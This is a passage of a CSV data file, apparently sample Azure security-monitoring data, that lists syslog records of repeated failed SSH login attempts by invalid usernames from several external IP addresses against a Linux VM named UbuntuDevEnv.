+3990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:03,UbuntuDevEnv,2019-06-26 13:38:03,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 196.46.36.144 port 48450 ssh2,127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,48450,,
+3991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:04,UbuntuDevEnv,2019-06-26 13:38:03,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 48450:11: Bye Bye [preauth],127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,48450,,
+3992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:04,UbuntuDevEnv,2019-06-26 13:38:03,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 196.46.36.144 port 48450 [preauth],127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,48450,,
+3993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:35,UbuntuDevEnv,2019-06-26 13:38:34,auth,UbuntuDevEnv,info,Invalid user web5 from 201.48.54.81 port 55747,127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web5,201.48.54.8,55747,,
+3994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:35,UbuntuDevEnv,2019-06-26 13:38:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:35,UbuntuDevEnv,2019-06-26 13:38:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:37,UbuntuDevEnv,2019-06-26 13:38:36,auth,UbuntuDevEnv,info,Failed password for invalid user web5 from 201.48.54.81 port 55747 ssh2,127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web5,201.48.54.8,55747,,
+3997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:37,UbuntuDevEnv,2019-06-26 13:38:37,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 55747:11: Bye Bye [preauth],127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,55747,,
+3998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:37,UbuntuDevEnv,2019-06-26 13:38:37,auth,UbuntuDevEnv,info,Disconnected from invalid user web5 201.48.54.81 port 55747 [preauth],127971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web5,201.48.54.8,55747,,
+3999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:00,UbuntuDevEnv,2019-06-26 13:38:59,auth,UbuntuDevEnv,info,Invalid user zhouh from 178.60.39.61 port 58167,128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,178.60.39.6,58167,,
+4000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:00,UbuntuDevEnv,2019-06-26 13:38:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:00,UbuntuDevEnv,2019-06-26 13:38:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.60.39.61,128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.60.39.6,,0,
+4002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:02,UbuntuDevEnv,2019-06-26 13:39:02,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 178.60.39.61 port 58167 ssh2,128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,178.60.39.6,58167,,
+4003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:02,UbuntuDevEnv,2019-06-26 13:39:02,auth,UbuntuDevEnv,info,Received disconnect from 178.60.39.61 port 58167:11: Bye Bye [preauth],128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.60.39.6,58167,,
+4004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:02,UbuntuDevEnv,2019-06-26 13:39:02,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 178.60.39.61 port 58167 [preauth],128059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,178.60.39.6,58167,,
+4005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:19,UbuntuDevEnv,2019-06-26 13:39:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:19,UbuntuDevEnv,2019-06-26 13:39:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:19,UbuntuDevEnv,2019-06-26 13:39:19,auth,UbuntuDevEnv,info,Invalid user testuser from 157.230.115.27 port 56288,128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,157.230.115.2,56288,,
+4008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:22,UbuntuDevEnv,2019-06-26 13:39:21,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 157.230.115.27 port 56288 ssh2,128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,157.230.115.2,56288,,
+4009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:22,UbuntuDevEnv,2019-06-26 13:39:21,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 56288:11: Bye Bye [preauth],128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,56288,,
+4010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:22,UbuntuDevEnv,2019-06-26 13:39:21,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 157.230.115.27 port 56288 [preauth],128132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,157.230.115.2,56288,,
+4011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:28,UbuntuDevEnv,2019-06-26 13:39:28,auth,UbuntuDevEnv,info,Invalid user hadoop from 139.199.34.112 port 48780,128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.199.34.1,48780,,
+4012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:28,UbuntuDevEnv,2019-06-26 13:39:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+4013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:28,UbuntuDevEnv,2019-06-26 13:39:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:30,UbuntuDevEnv,2019-06-26 13:39:30,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 139.199.34.112 port 48780 ssh2,128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.199.34.1,48780,,
+4015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:31,UbuntuDevEnv,2019-06-26 13:39:30,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 48780:11: Bye Bye [preauth],128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,48780,,
+4016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:39:31,UbuntuDevEnv,2019-06-26 13:39:30,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 139.199.34.112 port 48780 [preauth],128166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.199.34.1,48780,,
+4017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:37,UbuntuDevEnv,2019-06-26 13:41:36,auth,UbuntuDevEnv,info,Invalid user quentin from 139.199.34.112 port 36338,128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,quentin,139.199.34.1,36338,,
+4018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:37,UbuntuDevEnv,2019-06-26 13:41:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:37,UbuntuDevEnv,2019-06-26 13:41:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+4020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:39,UbuntuDevEnv,2019-06-26 13:41:38,auth,UbuntuDevEnv,info,Failed password for invalid user quentin from 139.199.34.112 port 36338 ssh2,128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,quentin,139.199.34.1,36338,,
+4021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:39,UbuntuDevEnv,2019-06-26 13:41:38,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 36338:11: Bye Bye [preauth],128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,36338,,
+4022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:39,UbuntuDevEnv,2019-06-26 13:41:38,auth,UbuntuDevEnv,info,Disconnected from invalid user quentin 139.199.34.112 port 36338 [preauth],128625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,quentin,139.199.34.1,36338,,
+4023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:45,UbuntuDevEnv,2019-06-26 13:42:44,auth,UbuntuDevEnv,info,Invalid user chuang from 157.230.115.27 port 34544,128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuang,157.230.115.2,34544,,
+4024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:45,UbuntuDevEnv,2019-06-26 13:42:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:45,UbuntuDevEnv,2019-06-26 13:42:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:47,UbuntuDevEnv,2019-06-26 13:42:46,auth,UbuntuDevEnv,info,Failed password for invalid user chuang from 157.230.115.27 port 34544 ssh2,128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuang,157.230.115.2,34544,,
+4027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:47,UbuntuDevEnv,2019-06-26 13:42:46,auth,UbuntuDevEnv,info,Disconnected from invalid user chuang 157.230.115.27 port 34544 [preauth],128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuang,157.230.115.2,34544,,
+4028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:42:47,UbuntuDevEnv,2019-06-26 13:42:46,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 34544:11: Bye Bye [preauth],128865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,34544,,
+4029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:09,UbuntuDevEnv,2019-06-26 13:43:09,auth,UbuntuDevEnv,info,Invalid user deploy2 from 196.46.36.144 port 36555,128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy2,196.46.36.1,36555,,
+4030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:09,UbuntuDevEnv,2019-06-26 13:43:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:09,UbuntuDevEnv,2019-06-26 13:43:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:11,UbuntuDevEnv,2019-06-26 13:43:11,auth,UbuntuDevEnv,info,Failed password for invalid user deploy2 from 196.46.36.144 port 36555 ssh2,128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy2,196.46.36.1,36555,,
+4033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:12,UbuntuDevEnv,2019-06-26 13:43:11,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 36555:11: Bye Bye [preauth],128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,36555,,
+4034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:12,UbuntuDevEnv,2019-06-26 13:43:11,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy2 196.46.36.144 port 36555 [preauth],128957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy2,196.46.36.1,36555,,
+4035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:50,UbuntuDevEnv,2019-06-26 13:43:49,auth,UbuntuDevEnv,info,Invalid user jorge from 139.199.34.112 port 52132,129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jorge,139.199.34.1,52132,,
+4036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:50,UbuntuDevEnv,2019-06-26 13:43:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:50,UbuntuDevEnv,2019-06-26 13:43:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+4038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:52,UbuntuDevEnv,2019-06-26 13:43:51,auth,UbuntuDevEnv,info,Failed password for invalid user jorge from 139.199.34.112 port 52132 ssh2,129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jorge,139.199.34.1,52132,,
+4039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:53,UbuntuDevEnv,2019-06-26 13:43:52,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 52132:11: Bye Bye [preauth],129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,52132,,
+4040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:53,UbuntuDevEnv,2019-06-26 13:43:52,auth,UbuntuDevEnv,info,Disconnected from invalid user jorge 139.199.34.112 port 52132 [preauth],129096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jorge,139.199.34.1,52132,,
+4041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:00,UbuntuDevEnv,2019-06-26 13:46:59,auth,UbuntuDevEnv,info,Did not receive identification string from 81.22.45.137 port 61000,129867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.22.45.1,61000,,
+4042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:19,UbuntuDevEnv,2019-06-26 13:47:19,auth,UbuntuDevEnv,info,Did not receive identification string from 5.196.23.14 port 33448,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,33448,,
+4043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:21,UbuntuDevEnv,2019-06-26 13:47:21,auth,UbuntuDevEnv,info,Did not receive identification string from 119.81.131.85 port 24263,129951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,24263,,
+4044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:52,UbuntuDevEnv,2019-06-26 13:47:51,auth,UbuntuDevEnv,info,Invalid user presta from 201.48.54.81 port 32879,130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,presta,201.48.54.8,32879,,
+4045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:52,UbuntuDevEnv,2019-06-26 13:47:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:52,UbuntuDevEnv,2019-06-26 13:47:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+4047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,auth,UbuntuDevEnv,info,Failed password for invalid user presta from 201.48.54.81 port 32879 ssh2,130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,presta,201.48.54.8,32879,,
+4048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 32879:11: Bye Bye [preauth],130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,32879,,
+4049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,auth,UbuntuDevEnv,info,Disconnected from invalid user presta 201.48.54.81 port 32879 [preauth],130048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,presta,201.48.54.8,32879,,
